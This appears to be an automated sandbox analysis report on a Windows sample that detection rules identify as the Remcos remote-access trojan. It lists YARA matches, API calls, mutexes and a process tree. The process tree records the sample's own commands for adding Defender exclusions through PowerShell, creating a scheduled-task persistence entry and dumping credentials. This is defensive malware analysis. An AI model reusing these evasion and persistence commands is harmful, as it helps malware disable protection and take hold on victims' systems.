                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: String function: 00434801 appears 41 times
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: String function: 00401E65 appears 34 times
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: String function: 00434E70 appears 54 times
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: String function: 004169A7 appears 87 times
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: String function: 0044DB70 appears 41 times
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: String function: 004165FF appears 35 times
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: String function: 00422297 appears 42 times
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: String function: 00444B5A appears 37 times
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: String function: 00413025 appears 79 times
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: String function: 00416760 appears 69 times
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6948 -s 12
                      Source: LdSbZG1iH6.exe, 00000000.00000000.1924856255.000000000094A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameZPyJ.exe4 vs LdSbZG1iH6.exe
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1996272245.0000000007A50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs LdSbZG1iH6.exe
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1987017480.000000000107E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs LdSbZG1iH6.exe
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1995759921.0000000007820000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs LdSbZG1iH6.exe
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1992230249.0000000003F1D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs LdSbZG1iH6.exe
                      Source: LdSbZG1iH6.exeBinary or memory string: OriginalFilenameZPyJ.exe4 vs LdSbZG1iH6.exe
                      Source: LdSbZG1iH6.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 10.2.DGlxtFUfY.exe.389e300.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 10.2.DGlxtFUfY.exe.389e300.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 10.2.DGlxtFUfY.exe.389e300.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 8.2.LdSbZG1iH6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 8.2.LdSbZG1iH6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 8.2.LdSbZG1iH6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 8.2.LdSbZG1iH6.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 8.2.LdSbZG1iH6.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 8.2.LdSbZG1iH6.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0.2.LdSbZG1iH6.exe.491ec58.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0.2.LdSbZG1iH6.exe.491ec58.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0.2.LdSbZG1iH6.exe.491ec58.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 10.2.DGlxtFUfY.exe.389e300.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 10.2.DGlxtFUfY.exe.389e300.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 10.2.DGlxtFUfY.exe.389e300.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0.2.LdSbZG1iH6.exe.491ec58.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0.2.LdSbZG1iH6.exe.491ec58.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000000.00000002.1992230249.000000000491E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000000.00000002.1992230249.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000000.00000002.1992230249.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: LdSbZG1iH6.exe PID: 7276, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: LdSbZG1iH6.exe PID: 7748, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: DGlxtFUfY.exe PID: 7840, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: LdSbZG1iH6.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: DGlxtFUfY.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, zF9cdEWZ6usHDRFDVF.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, zF9cdEWZ6usHDRFDVF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, zF9cdEWZ6usHDRFDVF.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, zF9cdEWZ6usHDRFDVF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, wXupdxkvZLWHsqKcjX.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, wXupdxkvZLWHsqKcjX.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, wXupdxkvZLWHsqKcjX.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, wXupdxkvZLWHsqKcjX.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, wXupdxkvZLWHsqKcjX.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, wXupdxkvZLWHsqKcjX.csSecurity API names: _0020.AddAccessRule
                      Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@29/27@1/2
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,16_2_004182CE
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,8_2_0041798D
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,16_2_00418758
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,8_2_0040F4AF
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,8_2_0041B539
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,8_2_0041AADB
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeFile created: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeMutant created: NULL
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-ZFXG9Y
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeMutant created: \Sessions\1\BaseNamedObjects\cmwJtqNjaQg
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8072
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6948
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7544:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8032:120:WilError_03
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeFile created: C:\Users\user\AppData\Local\Temp\tmpD8DB.tmpJump to behavior
                      Source: LdSbZG1iH6.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: LdSbZG1iH6.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeSystem information queried: HandleInformation
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: DGlxtFUfY.exe, DGlxtFUfY.exe, 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                      Source: DGlxtFUfY.exe, DGlxtFUfY.exe, 00000011.00000002.2259100532.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: DGlxtFUfY.exe, 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                      Source: DGlxtFUfY.exe, DGlxtFUfY.exe, 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                      Source: DGlxtFUfY.exe, DGlxtFUfY.exe, 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: DGlxtFUfY.exe, DGlxtFUfY.exe, 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: DGlxtFUfY.exe, DGlxtFUfY.exe, 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                      Source: LdSbZG1iH6.exeReversingLabs: Detection: 68%
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeFile read: C:\Users\user\Desktop\LdSbZG1iH6.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                      Source: unknownProcess created: C:\Users\user\Desktop\LdSbZG1iH6.exe "C:\Users\user\Desktop\LdSbZG1iH6.exe"
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LdSbZG1iH6.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DGlxtFUfY.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpD8DB.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess created: C:\Users\user\Desktop\LdSbZG1iH6.exe "C:\Users\user\Desktop\LdSbZG1iH6.exe"
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "c:\program files (x86)\internet explorer\iexplore.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe C:\Users\user\AppData\Roaming\DGlxtFUfY.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpECC1.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess created: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe "C:\Users\user\AppData\Roaming\DGlxtFUfY.exe"
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess created: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe C:\Users\user\AppData\Roaming\DGlxtFUfY.exe /stext "C:\Users\user\AppData\Local\Temp\xgyrrizik"
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess created: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe C:\Users\user\AppData\Roaming\DGlxtFUfY.exe /stext "C:\Users\user\AppData\Local\Temp\ijdkrtkjyyuu"
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess created: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe C:\Users\user\AppData\Roaming\DGlxtFUfY.exe /stext "C:\Users\user\AppData\Local\Temp\sdjcslvdtgmhffr"
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6948 -s 12
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8072 -s 1676
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LdSbZG1iH6.exe"Jump to behavior
